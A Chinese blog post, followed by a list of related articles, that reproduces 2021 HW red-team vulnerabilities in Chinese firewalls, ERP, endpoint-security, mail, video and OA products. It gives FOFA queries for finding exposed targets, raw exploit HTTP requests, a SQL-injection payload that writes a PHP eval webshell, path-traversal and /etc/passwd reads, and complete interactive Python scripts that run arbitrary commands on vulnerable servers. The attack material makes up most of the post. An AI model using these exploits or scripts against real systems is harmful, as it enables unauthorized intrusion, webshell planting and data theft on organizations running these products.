文章目录

前言
奇安信网康科技防火墙 RCE
用友NC BeanShell RCE漏洞
用友 ERP-NC 系统目录遍历
360天擎sql注入&未授权访问
深信服EDR登录绕过&&RCE
亿邮电子邮件系统 RCE 漏洞
好视通视频平台任意文件下载
蓝凌OA系统任意文件读取漏洞
总结

前言

2021 年国家 HW 行动期间，红队不断爆出各类 0day 漏洞，其中不乏国内著名安全厂商的安全设备的高危漏洞，不免让吃瓜群众大跌眼镜……更有大佬在 Github 开源了各类漏洞的 JAR 工具包合集，项目地址为—— PocList。

本文旨在记录下今年 HW 爆出的部分 0day 漏洞的复现过程及其 POC 脚本。

奇安信网康科技防火墙 RCE

产品简介

奇安信旗下的北京网康科技有限公司（以下简称网康科技）成立于2004年，总部位于北京，是中国上网行为管理理念的缔造者和下一代网络安全管理的引领者。

网康下一代防火墙（NGFW）是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。

漏洞描述

奇安信网康下一代防火墙存在远程命令执行，通过漏洞攻击者可以获取服务器权限。

影响范围

奇安信网康下一代防火墙。

FOFA语法

app="网康科技-下一代防火墙"

搜索结果如下：
漏洞路径

/directdata/direct/router

漏洞数据包

POST /directdata/direct/router HTTP/1.1
Host: 192.168.1.86
Connection: close
Content-Length: 160
Upgrade-Insecure-Requests: 1{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

漏洞复现

1、抓取登录数据包：

2、发送上述 POC 数据包：
3、然后访问：/test_test.txt ，如下：
4、写入 PHP 一句话木马：
5、蚁剑连接 test.php 木马文件：

EXP脚本

# -*- coding -*-
#网康下一代防火墙 命令执行import requests
requests.packages.urllib3.disable_warnings()
import sys,colorama
from colorama import *
init(autoreset=True)def title():print(colorama.Fore.GREEN + '+-------------------------------------------------------------+')print(colorama.Fore.GREEN +'+      网康下一代防火墙 命令执行 + RCE                +')print(colorama.Fore.GREEN +'+-------------------------------------------------------------+')print(colorama.Fore.GREEN +'+ EXP: python3 wangkangFirewall.py https://1.1.1.1:8443          +')print(colorama.Fore.GREEN +'+-------------------------------------------------------------+')print(colorama.Fore.GREEN +'+ 请输入url-格式为:https://xx.xx.xx.xx                           +')def cmd(urllist,cmdsr):url = urllist+'/directdata/direct/router'data = {"action": "SSLVPN_Resource", "data": [{"data": ["/var/www/html/d.txt;%s >/var/www/html/test.txt" % cmdsr]}], "f8839p7rqtj": "=", "method": "deleteImage", "tid": 17, "type": "rpc"}cmdlist = requests.post(url=url,json=data,verify=False)urlshow = urllist+'/test.txt'cmdshow = requests.get(url=urlshow,verify=False)cmdshowlist =  cmdshow.textif len(cmdshowlist) == 0:print(colorama.Fore.YELLOW  +'未读取到信息，请检查命令是否输入正确')print('------------------------------执行结果----------------------------------\n')print(colorama.Fore.RED +'{} '.format(cmdshow.text))print('------------------------------------------------------------------------\n')print(colorama.Fore.GREEN +'+ 输入下条需要执行的命令--退出输入Q：                           +')jhlist = input('')if jhlist == 'Q':passelse:cmd(urllist,jhlist)if __name__ == '__main__':#print('------------------------------------------------------------------------\n')title()url = input('    ')print(colorama.Fore.YELLOW  +'------------------------------------------------------------------------\n')print(colorama.Fore.GREEN +'+ 输入需要执行的命令                          +')cmds = input('')print(colorama.Fore.YELLOW  +'------------------------------------------------------------------------\n')cmd(url,cmds)

执行效果如下：

JAR工具

下载本文开头提及的 2021 年 HW 行动 POC 工具包—— PocList，使用其中的 QiAnXin-WangKangFirewall-RCE.jar 工具包：

食用效果如下：

用友NC BeanShell RCE漏洞

漏洞简介

用友 NC 是面向集团企业的管理软件，其在同类市场占有率中达到亚太第一。用友 NC 由于对外开放了 BeanShell 接口，攻击者可以在未授权的情况下直接访问该接口，并构造恶意数据执行任意代码从而获取服务器权限。

影响版本

用友 NC 6.5 版本，漏洞编号：CNVD-2021-30167。

FOFA搜集

title=="YONYOU NC"

搜索结果如下：
漏洞复现

1、目标站点：
2、访问路径/servlet/~ic/bsh.servlet.BshServlet，得到如图：

3、这里有执行代码的接口，输入Payload 如：exec("whoami");即可看到命令执行成功：

4、进一步可以反弹 Shell，此处不再深入。

修复方式

该漏洞为第三方 Jar 包漏洞导致，用友 NC 官方已发布安全补丁，建议使用该产品的用户及时安装该漏洞补丁包，补丁链接下载。

用友 ERP-NC 系统目录遍历

漏洞描述

用友 ERP-NC 存在目录遍历漏洞，攻击者可以通过目录遍历获取敏感文件信息。

FOFA搜索

app="用友-UFIDA-NC"

搜索结果如下：
漏洞复现

1、目标站点：
2、POC & EXP：访问路径/NCFindWeb?service=IPreAlertConfigService&filename= 即可：
3、在 filename 后面加文件名即可读取文件，此处读取 WEB-INF/web.xml 文件：

360天擎sql注入&未授权访问

产品简介

360 天擎终端安全管理系统是奇虎 360 面向政府、军队、金融、制造业、医疗、教育等大型企事业单位推出的以安全防御为核心、以运维管控为重点、以可视化管理为支撑、以可靠服务为保障的全方位终端安全解决方案。为用户构建能够有效抵御已知病毒、0day 漏洞、未知恶意代码和 APT 攻击的新一代终端安全防御体系。

漏洞描述

360 天擎系统存在SQL注入，攻击者可以通过漏洞上传木马；同时存在未授权越权访问，造成敏感信息泄露。

FoFa搜索

title=“360新天擎”

搜索结果如下：
漏洞复现

1、目标站点：
2、未授权访问漏洞泄露敏感信息，路径/api/dbstat/gettablessize，可直接访问获取数据库相关信息：
3、前台SQL注入，路径/api/dp/rptsvcsyncpoint?ccid=1，如下：

存在时间盲注：

4、可利用 SQL 注入写入 Shell：

/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\1.php';drop table O;--

深信服EDR登录绕过&&RCE

产品介绍

深信服终端检测响应平台 EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时，通过云网端联动协同、威胁情报共享、多层级响应机制，帮助用户快速处置终端安全问题，构建轻量级、智能化、响应快的下一代终端安全系统。

漏洞描述

2020 年HW第1天，深某服 EDR 被爆 0day 的截图在广大安全朋友圈中广为传播，后续 hw 暂停。

Fofa语法

title="终端检测响应平台"

搜索结果如下：
漏洞复现

1、目标站点如下：
2、前台登录绕过漏洞——Payload: https://IP/ui/login.php?user=admin，成功绕过登录：
3、命令执行漏洞——Payload: https://IP/tool/log/c.php?strip_slashes=system&host=id，如下图所示：
4、RCE 漏洞源码分析：深信服 EDR终端检测响应平台RCE漏洞代码分析。

亿邮电子邮件系统 RCE 漏洞

产品介绍

北京亿中邮信息技术有限公司（亿邮）——专业的邮件系统软件及整体解决方案，20年来积极致力于为电信运营商、政府、企业、教育等行业客户提供专业的技术平台和完整的网络通讯解决方案。

亿邮电子邮件系统在面市之初就凭借先进的技术水平、强大而稳定的性能和优质的售后服务，迅速填补了国内相关技术领域的空白，为中国电子邮件系统市场奠定了良好的发展基础，并在二十多年的发展中一直保持行业内的领先地位。

漏洞描述

亿邮电子邮件系统存在远程命令执行漏洞，攻击者可以执行任意命令。

Fofa语法

body="亿邮电子邮件系统"

搜索结果如下：
漏洞复现

1、目标站点如下：
2、直接构造数据包如下：

POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 39
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36type='|cat /etc/passwd||'

抓到的数据包如下：

构造数据包执行命令：
POC脚本

#   亿邮电子邮件系统 RCE
import requests
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import timedef title():print('+------------------------------------------')print('+-------------亿邮电子邮件系统 RCE------------')print('+------------------------------------------')def POC_1(target_url):vuln_url = target_url + '/webadm/?q=moni_detail.do&action=gragh'headers = {"Content-Type": "application/x-www-form-urlencoded"}data= "type='|cat /etc/passwd||'"try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response1 = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)if response1.status_code == 200 and 'root:x:0:0' in response1.text:print('目标{}可能存在漏洞,正在执行 cat /etc/passwd'.format(target_url))time.sleep(3)result = re.findall(r'</body></html>(.*)',response1.text,re.S)[0]print(result)while 1:cmd = input('输入想要执行的命令,输入exit退出\nCmd>>>')if cmd == 'exit':breakelse:POC_2(target_url, cmd)else:print('目标{}不存在漏洞'.format(target_url))except Exception as e:print('请求失败')def POC_2(target_url, cmd):vuln_url = target_url + '/webadm/?q=moni_detail.do&action=gragh'headers = {"Content-Type": "application/x-www-form-urlencoded"}data = "type='|{}||'".format(cmd)try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response1 = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)result = re.findall(r'</body></html>(.*)', response1.text, re.S)[0]print(result)except Exception as e:print('命令执行失败')if __name__ == '__main__':title()target_url = str(input("\033[35m请输入url\nUrl    >>> \033[0m"))POC_1(target_url)

好视通视频平台任意文件下载

产品介绍

深圳齐心好视通云计算有限公司是国内知名的云计算产品和服务提供商，隶属于齐心集团（股票代码：002301）。公司旗下“好视通”是国内云视频会议知名品牌，连续三年在云视频会议市场占有率第一（数据来源IDC调研报告），其应用范围主要包含：远程会议，远程教育，远程培训，远程医疗，远程招聘，应急指挥等。

漏洞简介

好视通视频会议平台系统存在弱口令和任意文件下载漏洞。

Fofa语法

"深圳银澎云计算有限公司"

搜索结果如下：
漏洞复现

1、目标站点如下所示：

2、默认口令 admin/admin 登录：
3、任意文件下载，Payload： /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini，效果如下：

蓝凌OA系统任意文件读取漏洞

产品介绍

深圳市蓝凌软件股份有限公司成立于2001年，生态OA引领者、数字化工作专业服务商、阿里云知识管理与协同领域首家战略合作伙伴，为各类组织提供智能办公、移动门户、知识管理、合同管理、数字运营、财务共享等一体化解决方案。

漏洞简介

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。

FoFa语法

app="Landray-OA系统"

搜索结果如下：
漏洞复现

1、目标站点页面如下：
2、随意抓取登录请求包：
3、提交如下请求包读取任意文件：

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: http://XXX.XXX.XXX.XXX
Connection: close
Referer: http://XXX.XXX.XXX.XXX/login.jsp
Cookie: JSESSIONID=342623A24CAE631E72E4E73A107E4971
Upgrade-Insecure-Requests: 1var={"body":{"file":"file:///etc/passwd"}}

效果如下：
POC脚本

#!/usr/bin/python3
#-*- coding:utf-8 -*-import base64
import requests
import random
import re
import json
import sysdef title():print('+------------------------------------------')print('+  \033[34mVersion: 蓝凌OA 任意文件读取                                          \033[0m')print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')print('+  \033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \033[0m')print('+------------------------------------------')def POC_1(target_url):vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Content-Type": "application/x-www-form-urlencoded"}data = 'var={"body":{"file":"file:///etc/passwd"}}'try:response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)print("\033[36m[o] 正在请求 {}/sys/ui/extend/varkind/custom.jsp \033[0m".format(target_url))if "root:" in response.text and response.status_code == 200:print("\033[36m[o] 成功读取 /etc/passwd \n[o] 响应为:{} \033[0m".format(response.text))except Exception as e:print("\033[31m[x] 请求失败:{} \033[0m".format(e))sys.exit(0)#
if __name__ == '__main__':title()target_url = str(input("\033[35mPlease input Attack Url\nUrl   >>> \033[0m"))POC_1(target_url)

食用效果如下：

总结

篇幅所限，不再继续演示复现 2021 年 HW 的 0day 漏洞了。此类漏洞的爆出多是源于代码审计，后续应训练提升自身的代码审计能力为重！

2021年 HW 漏洞更多详情请参见：

2021年 HW 详细的漏洞清单可参见：2021HW期间公布的部分漏洞及利用方式（部分附POC、EXP）；
Adminxe大佬的博客：Adminxe’s Blog 专注于信息安全和安全开发。

2021年国家HW行动部分0day漏洞复现相关推荐

海康威视iVMS系统在野 0day漏洞复现
漏洞概述简介:海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshe ...
Google 0day远程命令执行漏洞复现
目录漏洞介绍影响版本漏洞复现解决方案漏洞介绍国外安全研究员发布了 Google Chrome 浏览器远程代码执行 0Day 漏洞的 PoC,攻击者可以利用漏洞构造特制的页面,用户访问该页面 ...
海康威视iVMS综合安防系统任意文件上传漏洞复现（0day）
0x01 产品简介海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...
海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)
前言此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 一.漏洞描述海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations ...
【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
文章目录前言声明一.产品简介二.漏洞概述三.影响范围四.漏洞验证五.漏洞利用六.修复建议前言海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...
Flash 0day CVE-2018-4878 漏洞复现
0x01 前言 Adobe公司在当地时间2018年2月1日发布了一条安全公告: https://helpx.adobe.com/security/products/flash-player/apsa1 ...
【愚公系列】2023年05月网络安全高级班 035.HW护网行动攻防演练（0day漏洞防护）
文章目录前言一.背景二.实施思路三.成效亮点前言 0day漏洞指的是一种尚未被发现或公开披露的安全漏洞.攻击者可以利用这些漏洞进入受影响的系统或应用程序,可能会导致数据泄露.系统崩溃.恶意软 ...
大华智慧园区综合管理平台RCE漏洞复现(0day)
0x01 产品简介 "大华智慧园区综合管理平台"是一款综合管理平台,具备园区运营.资源调配和智能服务等功能.平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务 ...
谷歌宣布 Linux Kernel、Kubernetes 0day 漏洞奖励加倍
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士谷歌表示提高对 Linux Kernel.Kubernetes.Google Kubernetes Engine (GKE) 或kCTF 漏洞报 ...
安卓修复已遭在野利用的内核 0day 漏洞
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士谷歌安卓在2021年11月安全更新共修复了39个漏洞,其中18个位于框架和系统组件中,18个位于内核和供应商组件中. 安卓安全更新修复了一个0d ...

2021年国家HW行动部分0day漏洞复现

文章目录

前言

奇安信网康科技防火墙 RCE

用友NC BeanShell RCE漏洞

用友 ERP-NC 系统目录遍历

360天擎sql注入&未授权访问

深信服EDR登录绕过&&RCE

亿邮电子邮件系统 RCE 漏洞

好视通视频平台任意文件下载

蓝凌OA系统任意文件读取漏洞

总结

2021年国家HW行动部分0day漏洞复现相关推荐

最新文章

热门文章